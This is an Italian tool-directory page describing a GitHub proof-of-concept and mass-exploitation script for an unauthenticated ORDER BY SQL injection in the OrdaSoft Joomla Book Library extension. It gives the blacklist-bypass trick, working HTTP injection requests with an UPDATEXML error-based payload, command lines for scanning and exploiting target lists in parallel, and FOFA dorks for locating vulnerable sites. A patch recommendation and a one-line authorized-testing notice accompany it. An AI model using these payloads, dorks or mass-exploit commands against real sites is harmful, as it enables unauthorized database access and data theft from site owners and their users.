Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-101110 — PoC in Python 3 ed exploit di massa per CVE-2026-101110, un'iniezione SQL ORDER BY non autenticata in OrdaSoft Joomla Book Library <=6.4.6 tramite i parametri field/direction. | Kitploit
Strumenti/GitHubGitHub/murrez/cve-2026-101110
RicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitScripting e AutomazioneSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmurrez/cve-2026-101110

CVE-2026-101110

4 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

PoC in Python 3 ed exploit di massa per CVE-2026-101110, un'iniezione SQL ORDER BY non autenticata in OrdaSoft Joomla Book Library <=6.4.6 tramite i parametri field/direction.

Vedi Repository
Condividi

CVE-2026-101110 — OrdaSoft Book Library (Free) SQL injection non autenticata

PoC in Python 3 per CVE-2026-101110 — OrdaSoft Book Library (Free) per Joomla ≤ 6.4.6. Aggiornare a 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Catalogohttps://pocbit.org/pocs/
Componentecom_booklibrary
File / funzionesite/booklibrary.php → books()
Parametrifield, direction (ordinamento)
AutenticazioneNessuna (elenchi libri pubblici)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critico (Joomla CNA)
CreditiAla Arfaoui

Riepilogo della vulnerabilità (Türkçe)

Book Library (Free) è un'estensione OrdaSoft che fornisce librerie di libri / elenchi di categorie in Joomla. Nelle versioni 6.4.6 e precedenti, la funzione books() filtra i parametri field e direction con protectInjectionWithoutQuote(). Questa funzione applica solo una debole blacklist che cerca la sottostringa select; quando la trova, racchiude il valore con $db->quote() invece di rifiutarlo.

I valori vengono poi concatenati in un'espressione ORDER BY senza apici — dove l'uso delle quote non ferma l'iniezione SQL (descrizione CNA).

Due condizioni per l'exploit:

  1. Priming della sessione: la prima richiesta scrive i valori di ordinamento predefiniti (field / direction) memorizzati nella sessione.
  2. Bypass della blacklist: nella seconda richiesta, alla fine del payload viene aggiunto un commento decoy -- xselect; supera il controllo della blacklist, e il commento SQL non influisce sul resto del payload.

Risultato: SQLi in ORDER BY senza autenticazione, con rischio critico per la lettura/scrittura del database e l'integrità del sito.


Meccanismo tecnico

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Filtro debole (concettuale):

  • L'input contiene select (sottostringa) → racchiude l'intero valore tra apici (irrilevante nel contesto ORDER BY).
  • L'attaccante aggiunge -- xselect in modo che la blacklist veda select all'interno della coda del commento, mentre l'espressione attiva prima di -- rimane SQL eseguibile (trucchi error-based / UPDATEXML / stacked ORDER BY).

Il PoC implementa:

FaseAzione
Fingerprintpercorsi com_booklibrary + versione opzionale dal manifest
Route discoveryshowCategory, search, showBooks, books, … + catid / Itemid estratti
checkPrime della sessione → conferma SQLi (flag / VERSION())
exploitPrime → estrazione --subquery (predefinito SELECT VERSION())
mass--list + -j target paralleli; exploited.txt in caso di leak riuscito

Suffisso del payload costante nel codice: -- xselect (BLACKLIST_DECOY).


Requisiti

cd CVE-2026-101110
pip install -r requirements.txt

Utilizzo

Target singolo

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Mass bulk (workflow exploit-first)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagSignificato
--aggressiveLa modalità check tenta il leak della versione dopo il prime
--subqueryEspressione interna per payload UPDATEXML / double-query
--exploited-listEstrazioni riuscite separate da tab
--no-colorDisabilita ANSI (anche NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Esempio HTTP

Prime (sessione):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Inject (il PoC aggiunge il decoy):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

Le varianti POST vengono tentate sulla stessa route quando GET fallisce.


Rilevamento della versione

Manifest (se esposto):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → riga vulnerabile; ≥ 6.4.7 → corretta (patched_version nell'output del check).


Dork FOFA

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

CVE OrdaSoft correlate (Set 2026)

CVEEstensioneProblemaCorretto
CVE-2026-101110Book LibraryORDER BY SQLi + bypass blacklist6.4.7
CVE-2026-101111Book LibraryXSS riflesso (parametro title)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

Applicare la patch a tutti i componenti OrdaSoft che si distribuiscono.


Riferimenti

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Storico: SQLi più vecchie in com_booklibrary nei task search/lend (CVE-2010-1522) — percorsi di codice diversi

Note legali

Solo test autorizzati e validazione delle patch.


Descrizione del repository GitHub

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Scarica lo strumento